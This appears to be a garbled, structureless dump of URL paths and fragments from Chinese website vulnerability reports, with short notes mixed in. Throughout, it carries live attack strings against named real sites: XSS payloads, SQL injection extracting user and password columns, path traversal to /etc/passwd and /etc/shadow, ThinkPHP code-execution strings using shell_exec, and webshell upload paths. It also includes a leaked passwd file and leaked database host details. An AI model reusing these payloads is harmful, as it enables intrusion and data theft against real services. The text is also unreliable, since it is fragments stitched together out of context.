/forum/login.php?app=backyard&ip=203.187.187.130&key=599f2e40d49c8e9d47563c0b42fdaa5e×tamp=1197853827&u=http%3A%2F%2Ftool1.web.lfc.qihoo.net%2Fforum%2Fbak_index.html /Admin/Base/ /supsite/ /kaoqin/login.php /m/3398041534 /m/3398041534/#javascript:alert%28document.cookie%29%3B /home /home#javascript:alert(document.cookie);可见效果。) /m/\d+ /.+ xxxx /mblog/pic/20125_2_12/s_90649467295126824.png',a /mblog/pic/20125_2_12/s_123.png',a report.sinaapp.com/1.js /login.jsp?msg=%3C/td%3E%3Cscript%3Ealert%28%27changyou%27%29%3C/script%3E&url=category.jsp?gameId=1445&gameId=1445&gameId=1445&loginType=2 /passpod/tlpoint/passpodpay.jsp /manage.htm?TypeID=1 /manage.htm?TypeID=1 /zzbj/card页面中的选择服务器参数未进行过滤,导致post型sql注入漏洞,获取用户信息,包括身份证等等,并能进行脱裤操作。 /left.aspx /webadmin/MSList.aspx /Manage/EcFreight/EcShip_ProductCatFreightTypeMapList.aspx /webadmin/ActJoinPeoplesList.aspx这个页面的用户名,369页很吃力,分析用户找到了几个比较敏感的内部用户,登陆http://manage.coo8.com/这个就不好了。 /zzbj/card处,服务器参数server_id未进行过滤,可导致post型的sql注入。 /TRSSearcher/q?s=%3Cembed%20src=http://tmxk.org%3E /data/attachment/forum/201205/02/145451jnukk355o535gkd5.jpg /的一项搜索技术,被广泛应用。输入特殊字符它会报错,并不做过滤返回特殊字符,这样就构成了XSS。该公司网站本身存在XSS: /TRSSearcher/q?s=%3Cembed%20src=http://tmxk.org%3E /index.php?hostID=1 /specapp/Examples/ /WEBSITE3/DEFAULT.ASPX /home.html /upload.fcgi?pagetype=addphotoflash&hostid=259069614&tick=994e56351beec4af07903b240a62b408&block_index=0&block_count=1&uploadid=fileIte"/ /restServer.php?method=Code.checkCode_jsonb&check_code=zdt9&callback=%22/%3E%3Cscript%3Ealert%28/goderci/%29%3C/script%3E /list.php?pid=39 / /video.html#showdiv /RestAPI?method=api.base.getLoginUser&format=2&callback=%22/%3E%3Cscript%3Ealert%28/goderci/%29%3C/script%3E /service.do?template=api.com.login&format=jsonp&callback=jQu //content.airchina.com.cn) a.tudou.com/specapp/Examples/Autoindex/index.php / /plus/1.php /draw/tuyashow.php?t=xianger9527 /exec/movie_view.php?id=r34t6llj&viewid=23919 /Hotel-Info.php?ShopID=258 /index.php?mod=net&hash=wooyun.org&name=%3Cscript%3Ealert('wooyun.org')%3C/script%3E /db/dn/cat.php?id=daoju&w=%27/%3E%3Cscript%3Ealert%28/baidu/%29%3C/script%3E /db/dn/cat.php?id=zhuanbei&w= /注册帐号,然后填写需要查询的身份证号码以及姓名, /friend.php?ids=1599913322 /htcwildfire/friend.php?id=1599913322 /login.php?url=http%3A%2F%2Fweibo.com%2Fu%2F17751354XX,后面的17751354XX为我的微博id值。只要修改后就可以增加自己的粉丝。 /www/fuwuwangdian_list.php?lang=&id=860991 /admin /news/2012/0504/249657.shtml /utility/dict.php?from=qg&wv=2&sid=&fromid=1 /jt/ /vuldb/ssvid-30092 /jt/phpsso_server/api/uc.php?code=39caGV14OJvYIjY1cPl2mwf%2FMku60BPKoUK9HQsO91pn9q60Lw1rV9OCpFDsAtB433jiyC6PFY9pO1Dq8PnbaBdPrD8V1o1knpUsbuYejS58Hr8 /51javacms/PluginCtrl?page=DownLoadFilePage&path=/download&name=../../../../../../../../../../../etc/shadow /query_list.asp?name=%BA%D3%C4%CF%D6%A3%D6%DD%B9%AB%CB%BE / www.jszj.com.cn / /decor/fitmentphoto/search_writing.php?php?keytype=&keywords=%'union%20select%201,2,3,4,5,6,user(),8,database(),10,11,12,13,14,15,16,17%23 /blog/api/artedit.php /2014387123/78111bb333001c4o.html /red/.svn/text-base/minisite.php.svn-base / /auc/setup/setup_company_new.jsp /auc/merge/mail/file.jsp /upfiles/inc.asa /twnew/twnew_w/cfly/edit/upload.aspx?n=1110137649 /5107/chat/chat.php /5107/upload/screenImagesSave.php?filename=php.php /data/files/20120506/php.php /ws/cal/1/GET_JOURNALS?bn=MNGj0rVMNctpcbO^pZoQTw--&UID=301&RETURN_R=Y&RETURN_COMPONENT=true /server-status/ /server-status/ /server-status/ /server-status/ 202.108.33.34/server-status/ /server-status/ /server-status/ /admin/selectmag_list.php?act=getdaodu&id=18091&pid=24034存在sql注入漏洞 /admin/selectmag_list.php?act=getdaodu&id=18091&pid=24034 /5107/upload/screenImagesSave.php?filename=xx.php / /search?q=inurl:/5107/upload/upload.php&hl=en&noj=1&prmd=imvns&ei=E12mT4ugCcKjiQf7ofnHAw&start=10&sa=N&filter=0&biw=1366&bih=618 /login.asp为联通广州公司的销售管理系统,其中对uname值没有进行过滤处理,直接可以进行post型的sql注入。 DelComment(1719) DelComment(1717) /data/attachment/forum/201205/07/1631501vdlyx33l4d44krl.jpg /, /data/attachment/forum/201205/06/1844045mg3q96bvsj3eojn.jpg / /bnms/index.do / /clientva/web/p2p/fid_noseeder.php?date=2012-05-06%3Cscript%3Ealert(/xss/)%3C/script%3E /clientva/web/p2p/show.php?date="or /clientbeop/web/ /static/ludi/control/ /static/ludi/control/ /static/ludi/control/ /static/ludi/control/ /static/ludi/control/ /static/ludi/control/ /static/ludi/control/ /static/ludi/control/ /static/ludi/control/ /ssid%3D0/from%3D0/bd_page_type%3D1/pu%3Dat%401%2Cgt%40111111_0_0/uid%3Dwapp_1336062356514_634/soft?ext=&action=cgcate&cid=5b9a7042a40046c54&f=cindex(百度应用-分类)页面中,用户提交的数据没有经过过滤,导致可以执行js代码。 /ssid%3D0/from%3D0/bd_page_type%3D1/pu%3Dat%401%2Cgt%40111111_0_0/uid%3Dwapp_1336062356514_634/soft?ext=&action=cgcate&cid=5b9a70 /ssid%3D0/from%3D0/bd_page_type%3D1/pu%3Dat%401%2Cgt%40111111_0_0/uid%3Dwapp_1336062356514_634/soft?action=cgtophot&ext=&t=topnew /ssid%3D0/from%3D0/bd_page_type%3D1/pu%3Dat%401%2Cgt%40111111_0_0/uid%3Dwapp_1336062356514_634/soft?action=cgtopicindex&ext=&f=cgcateindex /ssid%3D0/from%3D0/bd_page_type%3D1/pu%3Dat%401%2Cgt%40111111_0_0/uid%3Dwapp_1336062356514_634/soft?action=cgcate&cid=5b9a70%22%3E%3Cscript%3Ealert%28%E2%80%98ali%E2%80%99%29%3C%2Fscript%3E42a40046c54&ext=%2Cs%402 /qzone/v5/toolpages/fp_utf8.html /wooyun2)微博中转发了36氪的某微博,然后手戝点了一下,看到36氪的主页(http://www.36kr.com/),WordPress程序,没搞头呀(手上有oady的可以wooyun一下),于是试试渗透吧。于是看到投资人服务那里有个分站链接:http://vc.36tr.com/ /avatar_image/20120507/11/34/90/n1336371610158.gif 6.0 /product/new/step3/1429 /pdf/ /Learningspace/test/student/zkz_print.asp?studentid=xxx&TestID=xxx,修改studentid和TestID,即可查看其他考生的准考证信息 /shtml/mobile_01.jsp.bak /.svn/entries /application/.svn/entries /system/.svn/entries /doc/.svn/entries /user_guide/.svn/entries /public/.svn/entries /netshop/check_tel.asp,由于这个页面是调用js的,并不是在此页面写的js,所以我们使用正常手机验证,验证完了 pc.ijinshan.com/source/.svn/entries pc.ijinshan.com/js/.svn/entries /indexSon.php?-s /plus/list.php?-s /index.php?-s /index.php?-s /bdetail.php?-s /?-s /index.php?-s /product.php?-s /index.php?-s /home.php?-s /?-s /index.php?-s /index.php?-s /news.php?-s /index.php?-s /index.php?-s /index.php?-s /index.php?-s /index.php?-s /city_caigou.php?-s /index.php?-s /index.php?-s /index.php?-s /cn/index.php?-s /all.php?-s /cn/index.php?-s /products.php?-s 113.106.100.60 href="#b"/ href="#abc href="#use"/ /UploadFile/ /UploadFile/ActivitiesExcel/ /UploadFile/ActivitiesFile/ActivitiesProgram/ /news/safe/895/20120228/17059956.html /jiancai/dealer/ajax/MobileCheck.aspx?action=MobileSendCode&mobile=手机号 /s?wd=site%3Awww.airmarket.com.cn&pn=50 /zzcx/search.asp?offset=1640 /xfzsw/weiquan_detail.asp?weiquanid=34 /daili/ding.asp?uid=93&id=4364 www.dahe.cn / / / / / / /service/v7846/ / / / / / / / /Action/ValidMobileCode.aspx?&action=SendCode&CodeType=1&phone=手机号 /wulin2/wlrangergrace/wlRangerCommentPage.action?imgid=22440 /wulin2/wlcaptor/wlCaptorRun.action?id=885 /nokia/index.php?parentid=7&groupid=0,文章也可以随便改 /opt/sites/qq__park/apps/ /usr/bin/python 2.7.2 /subject/wap/wap.aspx获取验证码,然后使用这个验证码就可以无限发送验证短信了 /subject/wap/WapHandler.ashx?requestNum=1&refid=6928722&moblie=136xxxxxx00&valcode=7023&iid=0.02490099416196369 / /cbs_xx.php?cbs_id=415 /0pgtest/pxb/backlogin.asp这里注入登陆上传配合列目录,获得webshell。 /prog/wapsite/sports/data/teaminfo.php?league_type_id=7&team_chinese=江苏舜天&team_id=30,注入漏洞 /cnvd/template/cnvd_advance_search_result.jsp /Plone /manage www.域名/thirdparty/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp /zsff/2011/tj2011_1.asp /zsff/2011/sj2011_1.asp /zsff/2011/zcpg2011.asp / /resume/resumeattach/other/201205/20120509_050149_13.php /digi/cgi-bin/search.php?style=1&module=search /search/search.php?style=1&module=compsea1&manu_name= /comment/skin/default.html /phpcms2008/phpcms/yp/product.php?catid=1&areaname=555%27%20and%20extractvalue%281,concat%280x09,%28version%28%29%29%29%29%20and%20%271%27=%271 /v/phpcms/yp/product.php?prowhere=1%27 /河南省电监会 /admin/adminlogin.asp /nmsframe/nmsframeinstall/ /myNew/main.php?mode=service&doaction=myValueAdd / /(你的ID)#//status/status?id=(对方ID) /index.php/Index/news_page/id/%7B$%7Bphpinfo%28%29%7D%7D /index.php/Index/news_page/id/%7B$%7B@print%28shell_exec%28chr%28108%29.chr%28115%29.chr%2832%29.chr%2845%29.chr%2897%29.chr%28108%29%29%29%7D%7D /Public/uploadfiles/ok.php /server-statu /manager/html /view.php?action=company&info=143983 /zhaopin/downLoadFile.do?path=school&key=attachments/../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00&genFileName=132000301eba4605f4c82b137babd890ed1c40593.zip /tags/att_script_defer.asp /sys/ /MessageList.aspx?id=16467存在注入。 /esf.aspx?lx=3&pathid=204 /xbnet-manager/upload/upload_pic.htm /logreport/awstats.pl?config=1EF226FFFFF511D118 /wxcs/ppo/YC/index.php/Public/MedInsurance/1/%7B$%7Bphpinfo()%7D%7D / /bug.php?action=view&id=248 /show_news.asp?bh=239 /GB/content.php?nid=46 /GB/content.php?nid=46 /GB/content.php?nid=46 /home.php/Index/getmodle/factoryid/%7B$%7Bphpinfo()%7D%7D /view/279020.htm /gzticket/jsp/ /gzticket/jsp/login/index.html /gzticket/jsp/log.jsp funcVec.size=2 funcVec.size=2 funcVec.size=2 funcVec.size=1 funcVec.size=1 funcVec.size=1 funcVec.size=1 funcVec.size=2 funcVec.size=1 funcVec.size=1 funcVec.size=2 funcVec.size=2 funcVec.size=2 funcVec.size=1 funcVec.size=1 funcVec.size=2 funcVec.size=3 funcVec.size=2 funcVec.size=2 funcVec.size=2 funcVec.size=2 funcVec.size=1 funcVec.size=1 funcVec.size=2 funcVec.size=2 funcVec.size=1 /apps/track/homeView?originUrl=http://www.163.com /apps/track/homeView?originUrl=%68%74%74%70%3a%2f%2f%77%77%77%2e%31%36%33%2e%63%6f%6d /yw.php?cid=93 /yw.php?cid=93 /yw.php?cid=93 x:0:0:root:/root:/bin/bash x:1:1:bin:/bin:/sbin/nologin x:2:2:daemon:/sbin:/sbin/nologin x:3:4:adm:/var/adm:/sbin/nologin x:4:7:lp:/var/spool/lpd:/sbin/nologin x:5:0:sync:/sbin:/bin/sync x:6:0:shutdown:/sbin:/sbin/shutdown x:7:0:halt:/sbin:/sbin/halt x:8:12:mail:/var/spool/mail:/sbin/nologin x:9:13:news:/etc/news x:10:14:uucp:/var/spool/uucp:/sbin/nologin x:11:0:operator:/root:/sbin/nologin x:12:100:games:/usr/games:/sbin/nologin x:13:30:gopher:/var/gopher:/sbin/nologin x:14:50:FTP /var/ftp:/sbin/nologin x:99:99:Nobody:/:/sbin/nologin x:69:69:virtual /dev:/sbin/nologin x:81:81:System /:/sbin/nologin x:74:74:Privilege-separated /var/empty/sshd:/sbin/nologin x:68:68:HAL /:/sbin/nologin x:48:48:Apache:/var/www:/sbin/nologin x:27:27:MySQL /var/lib/mysql:/bin/bash x:38:38::/etc/ntp:/sbin/nologin x:500:50::/opt/www:/sbin/nologin x:501:501::/var:/bin/bash x:0:0::/home/omaoma:/bin/bash /info.php /hot/all?query=%3Cscript%3Ealert%28%27hacked+by+Liuker%27%29%3C%2Fscript%2F /index.action?wc=290000 /try_channel.htm?tab_id=0&look_type=10 /admin/ /manage/index.asp /widget/ /utask/qb/info?callback= /support/faq.htm?partner= / /admin/up.jsp /ebpn/click.html?aid=1000059935001000001&mc=0%5EC100%5EC1000059935001000001%5EC0%5EC147.315%5EC1%5EC150%5EC1336875416%5EC1000000_292555189%7C1%7C1992-01-01%7C20%7C2%7C0086610100000000%7C400000010011_0086610100000000%7C41%7C0%7C0%7C0086610100000000%5EC100000000093%5EC0%5EC%5EC0%5ECrr_REMAIN_2_100%5EC100001%5EC1401815476635733347&refresh_source=3&refresh_idx=0&engine_type=1&ref=http%3A%2F%2Fwww.renren.com%2Fhome&url=http://www.wooyun.org/ /download?filename=2011-06-103288537.pdf&filepath=E:\Tomcat /robots.txt/1.php /index.php/Download/softDown/id/{${phpinfo() /manager/html / /info.php / /ScriptResource.axd?d=hQAnAAAAAAAAAAAAAAAAABBbuFBFK6jR0_azk6DRjgYAAAAAAAAAAAAAAAAAAAAA0 /enews/inforcenter/itdate/itdate.jsp?id=2 /pentest/database/sqlmap /enews/inforcenter/itdate/itdate.jsp?id=2 www.enet.com.cn/session www.enet.com.cn weibo.com /_common/jwplayer/player.swf evt.id evt.client evt.version /_common/jwplayer/player.swf?playerready= /_common/jwplayer/player.swf?playerready= /p/1583718448)。正好拿来突破这种限制了。 /_common/jwplayer/player.swf?playerready= /test3.js /_common/jwplayer/player.swf?playerready= /_common/jwplayer/player.swf?playerready= /t4/home/static/swf/img/SinaCollage.swf?JSHandler= /about.aspx?id=09187559-3061-4e1b-bd3c-24e23de714c5 /gg_view.aspx?id=9e3c4a9e-61e5-4a29-bb9d-2fa2a9166048 /news_view.aspx?id=0a77fd53-c7d7-46ca-a456-17e01da20e75 /wjgg_view.aspx?id=91d8409c-bf56-4e21-bcd7-5610e847cf9d /jgyj_view.aspx?id=7621cbf1-859b-41af-9d79-98fbede20fc2 /file/dpt8o212 / /test.php /web_frame/info_html.html /link.php?a=var_dump(3) /txjg/ /ad_1.asp?id=179 /admin/index.asp /hp/ /bb/ / /pmis/factory/ //index.php?act=old&mod=1%3Cdiv%20style%3dwidth%3aexpression%28alert%28document.cookie%29%29%3E&o=2 /flea/size_photo/100x75/2568/2567328.jpg/ /flea/size_photo/100x75/2568/2567328.jpg/ /flea/size_photo/100x75/2568/2567328.jpg/ /flea/size_photo/100x75/2568/2567328.jpg/ /flea/size_photo/100x75/2568/2567328.jpg/ swf taobao.com,找到淘宝域名下的若干FLASH文件。 /static/js/uploader.swf?eventHandler= /static/js/uploader.swf?eventHandler= /static/js/uploader.swf?eventHandler= /up /music/?_a=fmplay&fid=142 /index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D /index.php?s=contactus&a=noticeview&id=33 /xinding/lvbing/includes/sysconf.inc /user_center.php /news/index.jsp?type=HTML&pid=374&id=389 /index.jsp / /ww_bs/bs_info_view_detail.jsp?id=313存在sql注入。 /yunnanlawexam/download.jsp?filepath=D:%5CTomcat-5.5.16%5Cwebapps%5Cyunnanlawexam%5Cweb_manager/infocenter/annexfiles/IC04000000083.doc /dfmczg/publishdate.aspx?id=10014811 /paste/211/raw/ /hd/vip_gift.php alert(document.cookie) alert() / /kj2003/newskin/index.htm /dpool/soft/type.php?b=12 /?do=redirect&site= /?do=redirect&site=test&url= /share?q=a%22%2F%3E%3Cscript%3Ealert%283%29%3C%2Fscript%3E%3C%22 /lyb/list3.jsp?category=3 /lyb/result1.jsp?id=9618 /lyb/allList1.jsp?category=8 /all/index.php /all/index.php /uu/images/indax.php www.rayli.com.cn/mini/party2011/php/config.inc.php /toShop.jsp/Ε?cid=5112&channel=21394&tycourl=//us-r.dipns.net/134 /134/xdf.html /player.swf?debug= www.longtailvideo.com /files/flash/player.swf?debug=function(){alert(1) /files/flash/player.swf?debug=function(){var /files/flash/player.swf?debug= appmaker.sinaapp.com/a.js / /EnvAir/portal.aspx /WWaterV020/WWater/WWater.XXXXXWebUI.RMC/Video/HCNetVideoIndex.aspx /en_index.php /html/02/n-1202.html /html/12/n-412.html /scripts/o_code.js /gate/big5/apps.chinataiwan.org/static/qxdl/sub/mrzf.php?sortid=8 /gate/big5/apps.chinataiwan.org/static/qxdl/sub/shscsub.php?sortid=3&parentid=2 /gate/big5/apps.chinataiwan.org/static/qxdl/sub/mxxl.php?offset=1&sortid=20 /grid2008/brief/Libraryresult.aspx /export/flashplayer.swf /export/flashplayer.swf?onFileLoadedError=alert&onPlayPause=alert&autoplay=true&vid=a962553478ba87b54e229f3e&onPlayStart= /detail_rate.htm /rate.htm?user_id=546259XXX /u/xxxxxxx/view/ta_taoshare_list.htm /trade/detail/trade_item_detail.htm /member/user_profile.jhtml /message/add_private_msg.htm?recipient_nickname=马甲 /n/usbU87XEzOyXXXX/front.htm /my_taobao.htm?nekot=133711147XXXXX /trade/itemlist/list_bought_items.htm? /jmx-console/ /task.html页面登入,把这个cookis导出(IE浏览器),发送到其他人的电脑,通过ie浏览器导入我发送的cookis.txt文件,仍可进http://lixian.vip.xunlei.com/task.html离线下载页面,在迅雷离线下载新建离线下载任务,取回本地,很容易破解了迅雷离线下载。 / /sinadas.php?type=detail /sinadas.php?type=detail&id=28167%20and%201=2%20union%20select%201,version(),3,4,5,6,7,8,9,10,11,12%20/* /exploits/16019/ /eTax@SH_Management/Login.aspx。 //ilove.msnshell.com。进去一看,投票插件有注入,表名显示是dedecms,用户权限只有USAGE。 /?type= /m?keyfrom= /?keyfrom= /login.z?back_url= /baike /img/about.asp /img/about.asp?/list_T%D0%F4_7.htm /img/about.asp?tid_%B0%FC%D3%CA%BA%AB%B9%FA%B4%FA%B9%BA%B4%BA%D7%B0%B4%F2%B5%D7%C9%C0%20%C0%D9%CB%BF%C5%DD%C5%DD%D0%E4%B0%D7%C9%ABt%D0%F4%20%C5%AE%20%B6%CC%D0%E4%D0%A1%C9%C0%C5%AE%D7%B0%CF%C4%D7%B0.htm /manager/index.php后台泄漏 /inseasonnow/userdish.php?id=3740362 /inseasonnow/userdish.php?id=3740362 //view.php?cid=214&tid=9 //test.php //dianping/index.php?request=site&sid=547&type= //Search/?Page=5&Value= /publisher/status,只要POST一个参数content到接口即可。 /doover.php”,好多好友中招了。 left;display:none /publisher/status /doover.php"/ /service/online.php?action=saveadd /service/online.php?action=saveadd /tssVersion.aspx?cVer=%E6%9C%8D%E5%8A%A1%E9%80%9A%E6%99%AE%E5%8F%8A%E7%89%88 /,无限制登入,里面存储着所有的pdf的期刊论文,要是批量下载。 /logo/CNVDlogo.jpg /logo/CNVDlogo.jpg /toolmao.com/sinamail.htm) 32,9,13,10,12 /logo/CNVDlogo.jpg /jh网站尝试盗取QQ用户密码!成功后利用QQ密码对QQ用户进行聊天记录监控!!! /s?flag=WWWSOFTBARCOMWWWSOFTBARCOM /shop/design.htm?siteId=1&sid=71853403 /.svn/entries /.svn/entries /.svn/entries /.svn/entries /.svn/entries /luoke/dakaoyan/work.php对iid参数没有任何过滤导致了sql注入 /vote/show.php?voteid=7 /nationalday09/index.php?page=11 /readjs-guizhou-362384-0.html /2010mini/lephone/list.php /comment/comment.php?action=vote /sites/all/files/ofc_core/open-flash-chart.swf?get-data= /talent/TalentDetail.aspx?c=bb7f3776-61e0-4733-9645-28927d7eebf8 /talent/admin/ vip.astro.sina.com.cn/Zodiac/city.php?province=2 /products/redeem/agent/images/.svn/entries //products/packages/.svn/entries /blog/2012/05/xss-and-csrf-via-swf-applets-swfupload-plupload/ String /public/football_bang.php?p_id=../../../../../../../../../../etc/passwd%00.jpg / www.leho.com /content/239这里给予回复的每位同学 rayli.com.cn /allpage/info.php?artid=526081 /helpCenter.do?itemId=../../WEB-INF/web.xml%00&captionType=whelp /helpCenter.do?itemId=../../WEB-INF/web.xml%00&captionType=whelp /helpCenter.do?itemId=../../WEB-INF/classes/applicationContext.xml%00&captionType=whelp / / /helpCenter.do?itemId=../../WEB-INF/web.xml%00&captionType=whelp /servlet/download?filename=WEB-INF/classes/hetaimall-config.properties /servlet/download?filename=WEB-INF/classes/hetaimall-config.properties /?i=2508 /images/03.jpg /b.js'language='javascript /index.php?team=%B3%A9%CF%EB%CE%B4%C0%B4%Inject_Here%&stick=1&top=0 /view.php?page=23&id=-44596+uNioN+alL+sEleCT+1,2,3,concat(user,0x3a,password),5,6 /info.php /view.php?page=23&id=-44596+uNioN+alL+sEleCT+1,2,3,load_file(0x2f6574632f706173737764),5,6-- /logo/CNVDlogo.jpg /affiliate/WEB-INF/web.xml /affiliate/WEB-INF/struts-config.xml /affiliate/WEB-INF/classes/com/qunar/affiliate/actions/LogonAction.class /affiliate/logon.jsp /affiliate/WEB-INF/classes/hibernate.cfg.xml mysql://l-aff2.隐藏.隐藏.qunar.com/affiliate?characterEncoding=utf-8 /index.php/product/show?id=146 //code /Show/introduce/frmXiangXiXX.aspx?frm=introduce&id=2199 //www1.baidu.com/www.bch.com.cn,明显是因为搜索结果前少了http:// /5107/upload/uploadFlash.php / /basicinfo/Aboutus.do?act=list1 /login1.jsp /login.do /system/login!out.action /login.do /login.do /UploadFile/Image/shell.jsp none xxcj.sasac.gov.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector /cms/demo.php?pid=3075&from=874 /show.php?id=喵 /show.php?id=19727--select /show.php?id=12193 /show.php?id=12193-- /news.php?id=32947 /general/workflow/list/print.php?RUN_ID=1467&FLOW_ID=15&PRCS_ID=1&FLOW_VIEW=1&printView=1 /ckfinder/ckfinder.html漏洞页面 /robots.txt /300wan/cms.php/ /voting/cms.php/ /dashi/admin/ /dashi/admin/ / / / / / / /news_type.asp?id=1413 /sqlin.asp写入一句话,密码a /php/loadfile.php?file=/index.php可以下载设备中的文件。 www.tj.chinaunicom.com/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/ /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector /FCKeditor/editor/filemanager/upload/simpleuploader??Command=FileUpload&Type=File&CurrentFolder=/ /possible_1/blog/item/fa5d6731f933cb729922ed95.html /cache/nfm/201205181800/js/fm.js /v2/api/?getapi&class=login&tpl=im&tangram=false /js/tangram-base-1.5.2.1.js /cache/nfm/201205181800/js/belatedpng.js /cache/nfm/201205181800/js/monkey-utf8.js /v2/api/?getapi&class=reg&tpl=pp&tangram=false //js/v2RegPage.js?v=201205017 /Login.asp /mail?auth_token=XzmFbWZBRVAFiHNsiqpc&flash_info=1%3C%2ftitle%3E1%22%3E%3Cscript%3Ealert%28/insight/%29%3C/script%3E&_session_id=3b835f59978f064cf4ed19c49e3b1201 /fight_result?flash_info= /gonglue.jsp?pid=WCRTESTINPUT000000 /index.jsp?pid=WCRTESTINPUT000000 /fanBoxWidget?appId=29706&borderColor= /item/search.html?searchValue= /manage/index.aspx /manage/login.aspx /e.rar /database.rar /index.php?rs=../../../../../etc/passwd%00.jpg /han/pic/?kw=111 /cyportal1.3/downloadtag.jsp?fileName=2012%20%C5%A9%B7%A2%B4%F3%D7%A8%CF%EE%D4%A4%CB%E3%B0%B2%C5%C5%B1%ED.xls&filePath=site/site00/1290475676502/1290475834305/402881482c34fabe012c765a8bbf2076_attachment/402881483536d99d0135c7a7d97b492e/1.xls www.jamcode.org上的页面中的JS创建一个iframe,src为google.com/test.html google.com/test.html中的JS设置了window.name="数据内容 google.com/test.html中的JS*主动*location.replace跳转到jamcode.org/blank.html www.jamcode.org中的JS就可以获取到iframe.contentWindow.name的内容,完成跨域数据的获取。 www.jamcode.org上的页面中的JS创建一个iframe,src为google.com/test.html google.com/test.html中的JS设置了window.name="数据内容 www.jamcode.org在监听到iframe.onload事件之后,JS直接将iframe.src设置成www.jamcode.org/blank.html不必等待iframe中主动跳转,即可将iframe设置成同域的一个页面,并且window.name的数据不会丢失。 /info.php?catid=154&areaid=&posttime=0 /uweb/Schl/viewSchool?sc=1&c=44%20and%201=2%20union%20select%201,2,1,4,5,6,7,8,9,0,1,2%23 /uweb/Schl/viewSchool?sc=1&orderBy=lcsPrice&order=asc /uweb/Search/view?searchKeyWord=d&searchType=1&orderBy=startDate&order=desc /manage/download.jsp?filepath=fujian/1295424820703.pdf /diy/bisai.php?mont_h=2009-05&id=12&type=15&order=zj_vote+desc /web-console/ /music_swf/music_data.php?blogid=-0 /music_swf/music_data.php?blogid=-0 /script/image?key=&action=request。但是这里返回的是一个 Set Key=UnEscape(KS.S("Key"))//漏洞位置,只调用ks.s函数,无其它过滤。 rtitle=lcase(KS.G("rtitle")) Rkey=lcase(KS.G("Rkey")) ChannelID=KS.ChkClng(KS.S("Channelid")) ID=KS.ChkClng(KS.G("ID")) /bj/developer/detail/15998/$id/ /mail?auth_token=XzmFbWZBRVAFiHNsiqpc&flash_info=1%3C%2ftitle%3E1%22%3E%3Cscript%3Ealert%28/insight/%29%3C/script%3E&_session_id=3b835f59978f064cf4ed19c49e3b1201 /fight_result?flash_info= /gonglue.jsp?pid=WCRTESTINPUT000000 /index.jsp?pid=WCRTESTINPUT000000 /fanBoxWidget?appId=29706&borderColor= /item/search.html?searchValue= /Portal/solution_view.htm?viewId=4078B8D23EC5 /index.php/Cont?a_id=12883 /yangguangxingdong/admin/login.php为管理后台地址,其中用户名和密码使用“admin /update/ /xizang_yingwen/big.php?id=87 /mailstamp/stamp/getStamp.do?userName=xxxxxxxx@163.com&gui=2011&sid=CCqKXJHGVeInaNfXxTGGNxaguWLuIOIN&uid=xxxxxxxx@163.com&host=webmail.mail.163.com&ver=js4&style=21&skin=163blue&color=044fxsscsrf}%3C/style%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cmarquee%3Exxxxxxx&mid=1337757949276&subject=sss /cms /CMS/dede/ /downs.action?fileName=5bd49251-1603-40fd-9ce6-8e32a769dabf.doc&filePath=E:%5CTomcat6BackRun%5Cwebapps%5CROOT%5Cinformation/ /mvc?MVC_BUS=CPRegister&MVC_ACTION=NocpReg com:8080 6.0 /mvc?MVC_BUS=CPRegister&MVC_ACTION=NocpReg /certs/6513B59E371497A2FCAF47E6EC495666.jpg /certs/9AFF900FA65CF142E0506EBFC87A23D3.jsp / /login.asp /cms/Manage/Admin/Login.asp /weidadeshiye/Login.asp /jxbc/default.aspx / / /cgi-bin/euro12/vote/forum.cgi?id=809 /cgi-bin/upload/cgi_upload_activex?g_tk=321835484) /img/baidu_sylogo1.gif /img/baidu_sylogo1.gif /img/baidu_sylogo1.gif sinaapp.com/m.js /img/baidu_sylogo1.gif sinaapp.com/m.js /img/baidu_sylogo1.gif /img/baidu_sylogo1.gif xsst.sinaapp.com/m.js //index.php/module/action/param1/$%7B@phpinfo()%7D //index.php/module/action/param1/$%7B@phpinfo()%7D /tts/backAdmin/login.jsp?url=%2Ftts%2FbackAdmin%2F /crs/login.jsp /search.html s=88952634&searchkey=88952634 /说明.txt,打开后,就亮瞎我的狗眼了。管理员把聊天记录、笔记都放在上面了。直接搜索“密码”,“pwd”等字段,意外惊喜。 www.sina.com.cn www.sina.com www.gov.cn,作为政府机构,它的二级域应该为.gov.cn,国务院在申请域名的时候,以www为它的三级域名标识(也可以理解为企业标识),国务院没有设置主机名,所以国务院的全域名地址为www.gov.cn。下面是国务院的whois信息: www.gov.cn三级域标识以上的域名,或者是添加主机,假如我们添加一个上域test,那么全域名为test.www.gov.cn;假如我添加一个名为a的主机,不添加test域,那么这时它的全域名为a.www.gov.cn;假如我在test域以上添加一个名为a的主机,那么全域名地址为:a.test.www.gov.cn。 www.gov.cn了,这个时候,这个用户的全域名就和国务院的域名一模一样。 /getvcode.php /getvcode.php /userreg.htm /?src= /cgi-bin/fl/ring.cgi?r=184626 /cgi-bin/fl/ring.cgi?r=184626 /cgi-bin/fl/ring.cgi?r=184626 /cgi-bin/ja/main.cgi?action=view&id=1 /cgi-bin/fl/show.cgi?id=11499 /cgi-bin/fl/tag.cgi?t=新版 /cgi-bin/nw/main.cgi?cat=470 /?i=2517中提到的向量,测试UC /p-b04be1700121cf2eba0dc2bdd04f9f18/59594d3462b814d850187c25a9aefaf9?sign=MBO:jNU3V4XnGngC:HCIbllvsYreVw2AwmDWQfHSh%2F%2Bg%3D&response-content-disposition=attachment;%20filename=%22DNF%E7%BB%BF%E8%89%B2%E8%BF%9E%E5%8F%91V1.5.zip%22&response-cache-control=private /mf360/admin/index.aspx /admin/Login.aspx /hr/cgi-bin/admin/login.html /newwebloan/admin/header.aspx /admin/index.php?a=login /admin/login.php /CompMan/compman/suitinput.crm?method=getProduct&fatherId= /news/view_guonei2.asp?id=1520576 /news/view_guoji2.asp?id=1520750 /news/view_keji2.asp?id=1519277 /news/view_caijing2.asp?id=1517901 /news/view_titan2.asp?id=1519512 /main/view_it.asp?id=1518741 /news/view_yule2.asp?id=1517263 /kankan/ClickOnceX/KankanClickOnceX.application /wo_pc/product.jsp?id=45299 /Default.aspx) /resume.aspx?ChannelId=14&ColumnId=95 /companyBranch.aspx?str=850 